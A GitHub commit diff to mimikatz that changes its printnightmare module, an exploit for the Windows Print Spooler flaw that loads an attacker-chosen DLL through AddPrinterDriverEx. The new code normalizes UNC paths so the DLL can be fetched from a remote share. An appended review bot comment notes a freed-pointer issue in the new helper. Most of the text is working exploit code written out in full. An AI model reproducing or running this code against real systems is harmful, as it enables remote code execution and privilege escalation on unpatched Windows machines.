[new] mimikatz misc::printnightmare will normalize UNC path for libra…
…ry (\\ to \??\UNC\)
gentilkiwi committed Jul 7, 2021
1 parent b71f27b commit baaa261
Showing 2 changed files with 44 additions and 22 deletions.
64 changes: 43 additions & 21 deletions mimikatz/modules/kuhl_m_misc.c
@@ -1405,8 +1405,8 @@ NTSTATUS kuhl_m_misc_printnightmare(int argc, wchar_t * argv[])
{
RPC_BINDING_HANDLE hBinding;
RPC_STATUS rpcStatus;
LPCWSTR szRemote, szService, szLibrary, szShortLibrary;
LPWSTR szRand1, szName1, szName2, szSystem32, szDriver, szKernelBase, szDriverPath;
LPCWSTR szRemote, szService, szLibrary;
LPWSTR szShortLibrary, szRand1, szName1, szName2, szSystem32, szDriver, szKernelBase;
DRIVER_INFO_2 DriverInfo = {3, NULL,
#if defined(_M_X64) || defined(_M_ARM64)
L"Windows x64"
@@ -1428,22 +1428,16 @@ NTSTATUS kuhl_m_misc_printnightmare(int argc, wchar_t * argv[])
{
if(kull_m_string_args_byName(argc, argv, L"library", &szLibrary, NULL))
{
szShortLibrary = wcsrchr(szLibrary, L'\\');
if(szShortLibrary && *(szShortLibrary + 1))
if(kuhl_m_misc_printnightmare_normalize_library(szLibrary, &DriverInfo.pDataFile, &szShortLibrary))
{
szShortLibrary++;

if(kuhl_m_misc_printnightmare_CallEnumPrintersAndFindSuitablePath_par(hBinding, DriverInfo.pEnvironment, &szSystem32, &szDriver))
{
if(kull_m_string_sprintf(&szKernelBase, L"%skernelbase.dll", szSystem32))
{
kprintf(L"* KernelBase: %s\n", szKernelBase);
if(kull_m_string_sprintf(&szDriverPath, L"%sunidrv.dll", szDriver))
if(kull_m_string_sprintf(&DriverInfo.pDriverPath, L"%sunidrv.dll", szDriver))
{
DriverInfo.pDriverPath = szDriverPath;
DriverInfo.pDataFile = (LPWSTR) szLibrary;
kprintf(L"* DriverPath: %s\n| DataFile : %s (%s)\n", DriverInfo.pDriverPath, DriverInfo.pDataFile, szShortLibrary);

szRand1 = kull_m_string_getRandomGUID();
if(szRand1)
{
@@ -1463,15 +1457,15 @@ NTSTATUS kuhl_m_misc_printnightmare(int argc, wchar_t * argv[])
}
LocalFree(szRand1);
}
LocalFree(szDriverPath);
LocalFree(DriverInfo.pDriverPath);
}
LocalFree(szKernelBase);
}
LocalFree(szSystem32);
LocalFree(szDriver);
}
LocalFree(DriverInfo.pDataFile);
}
else PRINT_ERROR(L"Unable to get short library name from library path (%s)\n", szLibrary);
}
else if(kull_m_string_args_byName(argc, argv, L"clean", NULL, NULL))
{
@@ -1494,22 +1488,16 @@ NTSTATUS kuhl_m_misc_printnightmare(int argc, wchar_t * argv[])
{
if(kull_m_string_args_byName(argc, argv, L"library", &szLibrary, NULL))
{
szShortLibrary = wcsrchr(szLibrary, L'\\');
if(szShortLibrary && *(szShortLibrary + 1))
if(kuhl_m_misc_printnightmare_normalize_library(szLibrary, &DriverInfo.pDataFile, &szShortLibrary))
{
szShortLibrary++;

if(kuhl_m_misc_printnightmare_CallEnumPrintersAndFindSuitablePath_rprn(DriverInfo.pEnvironment, &szSystem32, &szDriver))
{
if(kull_m_string_sprintf(&szKernelBase, L"%skernelbase.dll", szSystem32))
{
kprintf(L"* KernelBase: %s\n", szKernelBase);
if(kull_m_string_sprintf(&szDriverPath, L"%sunidrv.dll", szDriver))
if(kull_m_string_sprintf(&DriverInfo.pDriverPath, L"%sunidrv.dll", szDriver))
{
DriverInfo.pDriverPath = szDriverPath;
DriverInfo.pDataFile = (LPWSTR) szLibrary;
kprintf(L"* DriverPath: %s\n| DataFile : %s (%s)\n", DriverInfo.pDriverPath, DriverInfo.pDataFile, szShortLibrary);

szRand1 = kull_m_string_getRandomGUID();
if(szRand1)
{
@@ -1529,13 +1517,14 @@ NTSTATUS kuhl_m_misc_printnightmare(int argc, wchar_t * argv[])
}
LocalFree(szRand1);
}
LocalFree(szDriverPath);
LocalFree(DriverInfo.pDriverPath);
}
LocalFree(szKernelBase);
}
LocalFree(szSystem32);
LocalFree(szDriver);
}
LocalFree(DriverInfo.pDataFile);
}
}
else if(kull_m_string_args_byName(argc, argv, L"clean", NULL, NULL))
@@ -1554,6 +1543,39 @@ NTSTATUS kuhl_m_misc_printnightmare(int argc, wchar_t * argv[])
return STATUS_SUCCESS;
}

BOOL kuhl_m_misc_printnightmare_normalize_library(LPCWSTR szLibrary, LPWSTR *pszNormalizedLibrary, LPWSTR *pszShortLibrary)
{
BOOL status = FALSE;

if(szLibrary == wcsstr(szLibrary, L"\\\\"))
{
status = kull_m_string_sprintf(pszNormalizedLibrary, L"\\??\\UNC%s", szLibrary + 1);
}
else
{
status = kull_m_string_copy(pszNormalizedLibrary, szLibrary);
}

if(status)
{
status = FALSE;
*pszShortLibrary = wcsrchr(*pszNormalizedLibrary, L'\\');
if(*pszShortLibrary && *(*pszShortLibrary + 1))
{
(*pszShortLibrary)++;
status = TRUE;
}
else
{
PRINT_ERROR(L"Unable to get short library name from library path (%s)\n", *pszNormalizedLibrary);
LocalFree(*pszNormalizedLibrary);
}
}
else PRINT_ERROR_AUTO(L"kull_m_string_sprintf/kull_m_string_copy");

return status;
}

void kuhl_m_misc_printnightmare_CallEnumPrintersAndMaybeDelete_par(handle_t hRemoteBinding, LPCWSTR szEnvironment, BOOL bIsDelete)
{
DWORD ret, i, cReturned = 0;
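Review bot: In the new `kuhl_m_misc_printnightmare_normalize_library` (last hunk), the failure branch calls `LocalFree(*pszNormalizedLibrary)` but leaves `*pszNormalizedLibrary` pointing at the freed buffer, and for a path ending in a backslash `*pszShortLibrary` points into it as well. When the sprintf/copy step fails, `*pszShortLibrary` is never written at all. Both visible call sites read the out-parameters only after a TRUE return, so nothing shown here dereferences them, but the helper is declared in the header and should reset them after the free with `*pszNormalizedLibrary = NULL; *pszShortLibrary = NULL;`. The prefix test `szLibrary == wcsstr(szLibrary, L"\\\\")` searches the whole string to answer a two-character question; `wcsncmp(szLibrary, L"\\\\", 2) == 0` states the intent directly. A short comment above the function should also record the ownership contract: on TRUE the caller must `LocalFree(*pszNormalizedLibrary)`, and `*pszShortLibrary` points inside that buffer and must not be freed separately.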
2 changes: 1 addition & 1 deletion mimikatz/modules/kuhl_m_misc.h
@@ -48,11 +48,11 @@ NTSTATUS kuhl_m_misc_spooler(int argc, wchar_t * argv[]);
NTSTATUS kuhl_m_misc_printnightmare(int argc, wchar_t * argv[]);
NTSTATUS kuhl_m_misc_sccm_accounts(int argc, wchar_t * argv[]);

BOOL kuhl_m_misc_printnightmare_normalize_library(LPCWSTR szLibrary, LPWSTR *pszNormalizedLibrary, LPWSTR *pszShortLibrary);
void kuhl_m_misc_printnightmare_CallEnumPrintersAndMaybeDelete_par(handle_t hRemoteBinding, LPCWSTR szEnvironment, BOOL bIsDelete);
BOOL kuhl_m_misc_printnightmare_CallEnumPrintersAndFindSuitablePath_par(handle_t hRemoteBinding, LPCWSTR szEnvironment, LPWSTR *szSystem32, LPWSTR *szDriver);
DWORD kuhl_m_misc_printnightmare_CallAddPrinterDriverEx_par(handle_t hRemoteBinding, PDRIVER_INFO_2 pInfo2, LPCWSTR szSystem32, LPCWSTR pConfigFile);
BOOL kuhl_m_misc_printnightmare_CallEnumPrinters_par(handle_t hRemoteBinding, LPCWSTR szEnvironment, _PDRIVER_INFO_2 *ppDriverInfo, DWORD *pcReturned);

void kuhl_m_misc_printnightmare_CallEnumPrintersAndMaybeDelete_rprn(LPCWSTR szEnvironment, BOOL bIsDelete);
BOOL kuhl_m_misc_printnightmare_CallEnumPrintersAndFindSuitablePath_rprn(LPCWSTR szEnvironment, LPWSTR *szSystem32, LPWSTR *szDriver);
DWORD kuhl_m_misc_printnightmare_CallAddPrinterDriverEx_rprn(PDRIVER_INFO_2 pInfo2, LPCWSTR szSystem32, LPCWSTR pConfigFile);
